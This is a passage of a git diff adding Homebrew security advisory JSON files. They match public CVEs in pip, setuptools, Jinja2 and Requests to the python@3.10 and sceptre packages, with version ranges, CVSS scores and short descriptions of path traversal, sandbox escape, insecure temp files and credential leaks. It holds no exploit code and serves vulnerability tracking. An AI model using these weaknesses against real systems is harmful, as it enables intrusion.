b/advisories/BREW-python@3.10-CVE-2026-6357.json new file mode 100644 index 00000000000..d6c550fd99e --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2026-6357.json @@ -0,0 +1,97 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2026-6357", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-jp4c-xjxw-mgf9", + "CVE-2026-6357", + "PYSEC-2026-2876" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.1", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "pip Vulnerable to Inclusion of Functionality from Untrusted Control Sphere", + "details": "pip prior to version 26.1 would run self-update check functionality after installing wheel files which required importing well-known Python modules names. These module imports were intentionally deferred to increase startup time of the pip CLI. The patch changes self-update functionality to run before wheels are installed to prevent newly-installed modules from being imported shortly after the installation of a wheel package. Users should still review package contents prior to installation.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6357" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/13923" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/commit/b369bfc96cc524e00c267e1693290e6599c36bad" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "https://ichard26.github.io/blog/2026/04/whats-new-in-pip-26.1/#security-fixes" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/04/27/7" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2026-8643.json b/advisories/BREW-python@3.10-CVE-2026-8643.json new file mode 100644 index 00000000000..077f333c226 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2026-8643.json @@ -0,0 +1,221 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2026-8643", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-wf93-45jw-7689", + "CVE-2026-8643", + "PYSEC-2026-196" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.1.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": " pip: Path traversal in console_scripts/gui_scripts entry point names allows installing scripts outside of target directory", + "details": "pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/14000" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:33313" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34776" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34777" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34778" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34780" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34891" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:36193" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:36315" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:37275" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:37283" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-8643" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460927" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2026-196.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ" + }, + { + "type": "WEB", + "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8643.json" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34374" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34456" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34739" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34740" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34741" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34748" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34749" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34750" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34752" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34756" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34758" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34760" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34765" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34772" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34773" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34774" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:34775" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/06/01/5" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2013-1633.json b/advisories/BREW-sceptre-CVE-2013-1633.json new file mode 100644 index 00000000000..4bc79902d66 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2013-1633.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2013-1633", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-27x4-j476-jp5f", + "CVE-2013-1633", + "PYSEC-2013-22" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.7", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@83.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "Setuptools vulnerable to Man-in-the-middle attacks", + "details": "easy_install in setuptools before 0.7 uses HTTP to retrieve packages from the PyPI repository, and does not perform integrity checks on package contents, which allows man-in-the-middle attackers to execute arbitrary code via a crafted response to the default use of the product.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1633" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2013-22.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://pypi.python.org/pypi/setuptools/0.9.8#changes" + }, + { + "type": "WEB", + "url": "http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2014-0012.json b/advisories/BREW-sceptre-CVE-2014-0012.json new file mode 100644 index 00000000000..77582cf0337 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2014-0012.json @@ -0,0 +1,129 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2014-0012", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-fqh9-2qgg-h84h", + "CVE-2014-0012", + "PYSEC-2014-82" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.7.2", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Insecure Temporary File in Jinja2", + "details": "FileSystemBytecodeCache in Jinja2 prior to version 2.7.2 does not properly create temporary directories, which allows local users to gain privileges by pre-creating a temporary directory with a user's uid. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-1402.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0012" + }, + { + "type": "WEB", + "url": "https://github.com/mitsuhiko/jinja2/pull/292" + }, + { + "type": "WEB", + "url": "https://github.com/mitsuhiko/jinja2/pull/296" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja2/pull/292" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja2/pull/296" + }, + { + "type": "WEB", + "url": "https://github.com/mitsuhiko/jinja2/commit/acb672b6a179567632e032f547582f30fa2f4aa7" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/acb672b6a179567632e032f547582f30fa2f4aa7" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=734747" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1051421" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja2" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2014-82.yaml" + }, + { + "type": "WEB", + "url": "http://seclists.org/oss-sec/2014/q1/73" + }, + { + "type": "WEB", + "url": "http://www.gentoo.org/security/en/glsa/glsa-201408-13.xml" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2014-1402.json b/advisories/BREW-sceptre-CVE-2014-1402.json new file mode 100644 index 00000000000..a026d74569f --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2014-1402.json @@ -0,0 +1,133 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2014-1402", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-8r7q-cvjq-x353", + "CVE-2014-1402", + "PYSEC-2014-8" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.7.2", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Incorrect Privilege Assignment in Jinja2", + "details": "The default configuration for `bccache.FileSystemBytecodeCache` in Jinja2 before 2.7.2 does not properly create temporary files, which allows local users to gain privileges via a crafted .cache file with a name starting with `__jinja2_` in `/tmp`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1402" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=734747" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1051421" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-8r7q-cvjq-x353" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2014-8.yaml" + }, + { + "type": "WEB", + "url": "https://oss.oracle.com/pipermail/el-errata/2014-June/004192.html" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150523060528/http://www.mandriva.com/en/support/security/advisories/advisory/MDVSA-2014:096/?name=MDVSA-2014:096" + }, + { + "type": "WEB", + "url": "http://advisories.mageia.org/MGASA-2014-0028.html" + }, + { + "type": "WEB", + "url": "http://jinja.pocoo.org/docs/changelog" + }, + { + "type": "WEB", + "url": "http://openwall.com/lists/oss-security/2014/01/10/2" + }, + { + "type": "WEB", + "url": "http://openwall.com/lists/oss-security/2014/01/10/3" + }, + { + "type": "WEB", + "url": "http://rhn.redhat.com/errata/RHSA-2014-0747.html" + }, + { + "type": "WEB", + "url": "http://rhn.redhat.com/errata/RHSA-2014-0748.html" + }, + { + "type": "WEB", + "url": "http://www.gentoo.org/security/en/glsa/glsa-201408-13.xml" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2014-1829.json b/advisories/BREW-sceptre-CVE-2014-1829.json new file mode 100644 index 00000000000..3c7dbe29fbb --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2014-1829.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2014-1829", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-cfj3-7x9c-4p3h", + "CVE-2014-1829", + "PYSEC-2014-13" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.3.0", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Requests", + "details": "Requests (aka python-requests) before 2.3.0 allows remote servers to obtain a netrc password by reading the Authorization header in a redirected request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1829" + }, + { + "type": "WEB", + "url": "https://github.com/kennethreitz/requests/issues/1885" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/issues/1885" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=733108" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-cfj3-7x9c-4p3h" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psf/requests" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2014-13.yaml" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150523055216/http://www.mandriva.com/en/support/security/advisories/advisory/MDVSA-2015:133/?name=MDVSA-2015:133" + }, + { + "type": "WEB", + "url": "http://advisories.mageia.org/MGASA-2014-0409.html" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2015/dsa-3146" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:133" + }, + { + "type": "WEB", + "url": "http://www.ubuntu.com/usn/USN-2382-1" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2014-1830.json b/advisories/BREW-sceptre-CVE-2014-1830.json new file mode 100644 index 00000000000..03fccf90ba1 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2014-1830.json @@ -0,0 +1,117 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2014-1830", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-652x-xj99-gmcc", + "CVE-2014-1830", + "PYSEC-2014-14" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.3.0", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Requests", + "details": "Requests (aka python-requests) before 2.3.0 allows remote servers to obtain sensitive information by reading the Proxy-Authorization header in a redirected request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1830" + }, + { + "type": "WEB", + "url": "https://github.com/kennethreitz/requests/issues/1885" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/issues/1885" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=733108" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psf/requests" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2014-14.yaml" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150523055216/http://www.mandriva.com/en/support/security/advisories/advisory/MDVSA-2015:133/?name=MDVSA-2015:133" + }, + { + "type": "WEB", + "url": "http://advisories.mageia.org/MGASA-2014-0409.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00095.html" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2015/dsa-3146" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:133" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2015-2296.json b/advisories/BREW-sceptre-CVE-2015-2296.json new file mode 100644 index 00000000000..a98d7fcb872 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2015-2296.json @@ -0,0 +1,115 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2015-2296", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-pg2w-x9wp-vw92", + "CVE-2015-2296", + "PYSEC-2015-17" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.6.0", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Python Requests Session Fixation", + "details": "The `resolve_redirects` function in sessions.py in requests 2.1.0 through 2.5.3 allows remote attackers to conduct session fixation attacks via a cookie without a host value in a redirect.", + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2296" + }, + { + "type": "WEB", + "url": "https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psf/requests" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2015-17.yaml" + }, + { + "type": "WEB", + "url": "https://warehouse.python.org/project/requests/2.6.0" + }, + { + "type": "WEB", + "url": "http://advisories.mageia.org/MGASA-2015-0120.html" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-March/153594.html" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:133" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/03/14/4" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/03/15/1" + }, + { + "type": "WEB", + "url": "http://www.ubuntu.com/usn/USN-2531-1" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2016-10745.json b/advisories/BREW-sceptre-CVE-2016-10745.json new file mode 100644 index 00000000000..0354421fb0f --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2016-10745.json @@ -0,0 +1,137 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2016-10745", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-hj2j-77xm-mc5v", + "CVE-2016-10745", + "PYSEC-2019-220" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.8.1", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Jinja2 sandbox escape vulnerability", + "details": "In Pallets Jinja before 2.8.1, str.format allows a sandbox escape.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10745" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/9b53045c34e61013dc8f09b7e52a555fa16bed16" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:1022" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:1237" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:1260" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:3964" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:4062" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-hj2j-77xm-mc5v" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2019-220.yaml" + }, + { + "type": "WEB", + "url": "https://palletsprojects.com/blog/jinja-281-released" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4011-1" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4011-2" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2016-9015.json b/advisories/BREW-sceptre-CVE-2016-9015.json new file mode 100644 index 00000000000..f77e247dbc1 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2016-9015.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2016-9015", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-v4w5-p2hg-8fh6", + "CVE-2016-9015", + "PYSEC-2017-98" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": 